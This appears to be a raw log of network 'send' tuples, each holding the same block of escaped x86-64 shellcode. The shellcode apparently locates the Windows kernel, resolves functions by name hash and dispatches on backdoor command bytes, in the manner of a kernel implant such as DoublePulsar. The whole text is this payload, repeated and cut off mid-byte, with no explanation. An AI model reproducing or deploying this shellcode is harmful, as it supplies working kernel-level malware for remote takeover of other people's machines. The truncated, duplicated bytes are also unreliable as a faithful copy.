\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 13, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 14, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 15, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\x8b@\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\xe8@\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\x